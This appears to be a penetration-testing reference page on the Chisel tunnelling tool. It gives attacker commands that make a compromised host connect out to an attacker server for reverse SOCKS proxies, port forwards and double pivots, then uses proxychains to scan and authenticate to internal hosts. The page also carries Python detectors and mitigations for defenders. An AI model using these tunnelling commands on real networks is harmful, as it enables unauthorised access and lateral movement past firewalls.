Chisel
Overview
Chisel is a TCP/UDP tunnel transported over HTTP with SSH encryption. It creates tunnels through firewalls by encapsulating traffic in HTTP, making it effective in environments where only web traffic is allowed. Chisel supports forward tunnels, reverse tunnels, and SOCKS proxies. A single binary runs on both client and server — transfer it to the target for pivoting.
ATT&CK Mapping
- Tactic: TA0011 - Command and Control
- Technique: T1572 - Protocol Tunneling
Prerequisites
- Chisel binary on both attacker and target (single Go binary, no dependencies)
- Network connectivity between target and attacker (HTTP/HTTPS)
- On Kali:
sudo apt install -y chisel
Techniques
Reverse SOCKS Proxy (Most Common)
Route all traffic through the target to reach internal networks:
On attacker (server):
# Chisel
# https://github.com/jpillora/chisel
chisel server --reverse --port 8080
On target (client):
chisel client <attacker_ip>:8080 R:socks
This creates a SOCKS5 proxy on the attacker at 127.0.0.1:1080. Use with proxychains:
# Configure proxychains: socks5 127.0.0.1 1080
proxychains nmap -sT -Pn -p 445 <internal_target>
proxychains nxc smb <internal_target> -u <user> -p <password>
Reverse SOCKS on Custom Port
# On attacker
chisel server --reverse --port 8080
# On target — SOCKS proxy on port 9050 instead of 1080
chisel client <attacker_ip>:8080 R:9050:socks
Reverse Port Forward
Expose a specific internal service on the attacker:
# On attacker
chisel server --reverse --port 8080
# On target — forward internal RDP to attacker's port 3389
chisel client <attacker_ip>:8080 R:3389:<internal_target>:3389
# On target — forward internal web server to attacker's port 8888
chisel client <attacker_ip>:8080 R:8888:<internal_target>:80
Multiple forwards in one connection:
# On target
chisel client <attacker_ip>:8080 R:3389:<dc>:3389 R:445:<dc>:445 R:socks
Forward SOCKS Proxy
When the target can accept inbound connections:
On target (server):
chisel server --socks5 --port 8080
On attacker (client):
chisel client <target_ip>:8080 socks
Forward Port Forwarding
# On target (server)
chisel server --port 8080
# On attacker (client) — access target's port 80 on local port 8888
chisel client <target_ip>:8080 8888:localhost:80
Double Pivot
Chain chisel through multiple hosts:
# Attacker → Pivot1 → Pivot2 → Internal network
# On attacker
chisel server --reverse --port 8080
# On Pivot1 (connects back to attacker, opens SOCKS)
chisel client <attacker>:8080 R:1080:socks
# On Pivot1 (also runs a server for Pivot2)
chisel server --reverse --port 9090
# On Pivot2 (connects back to Pivot1, opens SOCKS)
chisel client <pivot1>:9090 R:1081:socks
# On attacker, chain proxies in proxychains4.conf:
# strict_chain
# [ProxyList]
# socks5 127.0.0.1 1080
# socks5 127.0.0.1 1081
# (each entry is reached through the one before it, so 127.0.0.1:1081 is Pivot1's loopback, where Pivot2's SOCKS listens)
Detection Methods
Network-Based Detection
- HTTP traffic with WebSocket upgrade headers to non-standard ports
- Sustained HTTP connections with consistent bidirectional data transfer
- HTTP connections to external IPs that don't match normal web browsing
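The three network indicators above can be turned into a simple scorer over per-connection HTTP metadata. The following is an added example for this page, not code from the chisel project: the session record shape, the set of "normal" web ports, the volume thresholds and the baseline of known destinations are all assumptions, and the sample sessions are constructed. The Sec-WebSocket-Protocol check relies on chisel announcing its protocol version (chisel-v3 in recent releases) as the WebSocket subprotocol; confirm the value against the version you are dealing with.

```python
"""Score HTTP session records for chisel-style tunnelling.

Added example for this page, not code from the chisel project. The session
record shape, the "normal" port set and the baseline of known destinations are
assumptions; the sample sessions below are constructed.
"""
from dataclasses import dataclass

NORMAL_WEB_PORTS = {80, 443}          # what browsers on this network normally use (assumed)
# chisel advertises its protocol version (chisel-v3 in recent releases) as the
# WebSocket subprotocol; check the value against the chisel version in question
CHISEL_SUBPROTOCOL_PREFIX = "chisel-"


@dataclass
class HttpSession:
    src: str
    dst: str
    dport: int
    headers: dict        # client request headers, names lower-cased
    duration_s: float    # lifetime of the TCP connection
    bytes_out: int       # client -> server payload bytes
    bytes_in: int        # server -> client payload bytes
    dst_internal: bool   # destination inside the monitored network


def is_websocket_upgrade(headers):
    """True when the request asked to switch the connection to WebSocket."""
    return (headers.get("upgrade", "").lower() == "websocket"
            and "upgrade" in headers.get("connection", "").lower())


def session_findings(s, baseline_dsts=frozenset(), min_duration_s=300.0,
                     min_bytes=65536, balance_max=4.0):
    """Return the list of indicators one session triggers (empty for benign)."""
    hits = []
    ws = is_websocket_upgrade(s.headers)
    if ws and s.dport not in NORMAL_WEB_PORTS:
        hits.append("websocket-upgrade-nonstandard-port")
    if s.headers.get("sec-websocket-protocol", "").lower().startswith(CHISEL_SUBPROTOCOL_PREFIX):
        hits.append("chisel-subprotocol")
    # Browsing is short and download-heavy; a tunnel stays up and carries
    # comparable volumes in both directions.
    low, high = sorted((s.bytes_in, s.bytes_out))
    if s.duration_s >= min_duration_s and low >= min_bytes and high <= balance_max * low:
        hits.append("sustained-bidirectional-http")
    if hits and not s.dst_internal and s.dst not in baseline_dsts:
        hits.append("external-destination-not-in-baseline")
    return hits


def scan_sessions(sessions, baseline_dsts=frozenset()):
    """Return [(src, dst, dport, findings)] for sessions that triggered anything."""
    out = []
    for s in sessions:
        hits = session_findings(s, baseline_dsts)
        if hits:
            out.append((s.src, s.dst, s.dport, hits))
    return out


# Constructed sample sessions (not captured traffic)
BASELINE = frozenset({"198.51.100.7"})
SAMPLE_SESSIONS = [
    # reverse-tunnel style: long-lived, balanced, WebSocket to 8080 on an unknown external host
    HttpSession("10.0.0.5", "203.0.113.10", 8080,
                {"upgrade": "websocket", "connection": "Upgrade",
                 "sec-websocket-protocol": "chisel-v3"},
                7200.0, 3_000_000, 2_500_000, False),
    # ordinary page load
    HttpSession("10.0.0.20", "198.51.100.7", 443, {"accept": "text/html"},
                12.0, 2_000, 150_000, False),
    # legitimate WebSocket application on 443 to a baselined destination
    HttpSession("10.0.0.20", "198.51.100.7", 443,
                {"upgrade": "websocket", "connection": "keep-alive, Upgrade"},
                3600.0, 50_000, 60_000, False),
    # internal WebSocket on 8080 with tunnel-like volume, no subprotocol header
    HttpSession("10.0.0.20", "10.0.0.50", 8080,
                {"upgrade": "websocket", "connection": "Upgrade"},
                600.0, 100_000, 120_000, True),
]

if __name__ == "__main__":
    for src, dst, dport, hits in scan_sessions(SAMPLE_SESSIONS, BASELINE):
        print(f"{src} -> {dst}:{dport}: {', '.join(hits)}")
```

The thresholds are deliberately conservative so that a single long WebSocket session on 443 to a known destination (the third sample) produces nothing; tune `min_bytes` and `balance_max` to the volumes you actually see from servers that should not be browsing at all.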
Host-Based Detection
- Unknown binary named chisel running on endpoints
- Process with --reverse or R:socks in command line arguments
- Unusual outbound HTTP connections from servers
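Matching on the binary name alone misses a renamed copy, but the argument shape is harder to hide: a client always takes a server address followed by remote specs, and the remote spec grammar is fixed. The script below, an added example for this page and not code from the chisel project, decodes that grammar (the same one used by every command in the Techniques section) and applies it to process-creation events. The event format (host / image / cmdline JSON lines) is an assumption modelled loosely on EDR or Sysmon process-creation telemetry, the set of value-less client flags is a partial assumption, and the sample events are constructed.

```python
"""Decode chisel command lines found in process-creation telemetry.

Added example for this page; it is not code from the chisel project.
The event format (host / image / cmdline JSON lines) is an assumption
modelled loosely on EDR or Sysmon process-creation records.
"""
import json
import shlex

SOCKS_DEFAULT_PORT = 1080          # chisel's default port for a SOCKS remote
IMAGE_NAMES = {"chisel", "chisel.exe"}
# client flags assumed to take no value; any other flag is assumed to consume the next token
BOOL_FLAGS = {"-v", "--pid", "--tls-skip-verify", "--help", "-h"}


def parse_remote(spec):
    """Decode one chisel remote spec into a dict.

    Grammar, as documented in chisel's help text:
      [R:][local-host:]local-port:remote-host:remote-port
      [R:][local-host:][local-port:]socks
    local-port defaults to remote-port; the SOCKS port defaults to 1080.
    Bracketed IPv6 literals are not handled (simplification).
    """
    reverse = spec.startswith("R:")
    parts = (spec[2:] if reverse else spec).split(":")
    out = {"spec": spec, "reverse": reverse, "local_host": None}
    if parts[-1] == "socks":
        head = parts[:-1]                      # [] | [port] | [host, port]
        if len(head) > 2:
            raise ValueError(spec)
        out["kind"] = "socks"
        out["local_port"] = int(head[-1]) if head else SOCKS_DEFAULT_PORT
        out["local_host"] = head[0] if len(head) == 2 else None
        return out
    if len(parts) == 2:
        remote_host, remote_port = parts
        local_port = int(remote_port)
    elif len(parts) == 3:
        local_port, remote_host, remote_port = int(parts[0]), parts[1], parts[2]
    elif len(parts) == 4:
        out["local_host"] = parts[0]
        local_port, remote_host, remote_port = int(parts[1]), parts[2], parts[3]
    else:
        raise ValueError(spec)
    out.update(kind="forward", local_port=local_port,
               remote_host=remote_host, remote_port=int(remote_port))
    return out


def scan_event(event):
    """Return findings for one process-creation event (a dict)."""
    findings = []
    image = event.get("image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    if image in IMAGE_NAMES:
        findings.append("image-name-chisel")
    argv = shlex.split(event.get("cmdline", ""))
    if len(argv) < 2:
        return findings
    mode, rest = argv[1], argv[2:]
    if mode == "server":
        if "--reverse" in rest:
            findings.append("server-accepts-reverse-tunnels")
        if "--socks5" in rest:
            findings.append("server-offers-socks5")
    elif mode == "client":
        # Drop options (and their values) so what remains is <server> <remote>...
        positional, skip = [], False
        for tok in rest:
            if skip:
                skip = False
            elif tok.startswith("-"):
                skip = tok not in BOOL_FLAGS and "=" not in tok
            else:
                positional.append(tok)
        for tok in positional[1:]:             # positional[0] is the server address
            try:
                remote = parse_remote(tok)
            except ValueError:
                continue
            direction = "reverse" if remote["reverse"] else "forward"
            findings.append(f"{direction}-{remote['kind']}:{tok}")
    return findings


def scan_events(lines):
    """Map each host to its findings, for a sequence of JSON event lines."""
    report = {}
    for line in lines:
        event = json.loads(line)
        hits = scan_event(event)
        if hits:
            report[event["host"]] = hits
    return report


# Constructed sample telemetry (not real data); 203.0.113.10 is a documentation address
SAMPLE_EVENTS = [
    '{"host": "web01", "image": "/tmp/chisel", "cmdline": "chisel client 203.0.113.10:8080 R:socks"}',
    '{"host": "db02", "image": "/var/tmp/.cache/svchost", '
    '"cmdline": "./svchost client --max-retry-count 5 203.0.113.10:8080 '
    'R:3389:10.0.0.5:3389 R:445:10.0.0.5:445 R:socks"}',
    '{"host": "jump01", "image": "/usr/bin/chisel", "cmdline": "chisel server --reverse --port 8080"}',
    '{"host": "ws17", "image": "/usr/bin/curl", "cmdline": "curl -s https://example.com/"}',
]

if __name__ == "__main__":
    for host, hits in scan_events(SAMPLE_EVENTS).items():
        print(host, hits)
```

The second sample shows why the grammar matters: the binary is renamed, so the name check is silent, but the decoded remotes still say exactly what the host is doing (two reverse port forwards to 10.0.0.5 plus a reverse SOCKS proxy), which is the detail an analyst needs when scoping the incident.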
Mitigation Strategies
- Application whitelisting — prevent execution of unauthorized binaries
- Egress filtering — restrict outbound HTTP connections from servers to known destinations
- Network monitoring — detect WebSocket upgrade requests to non-web servers
- Deep packet inspection — identify tunneled traffic inside HTTP connections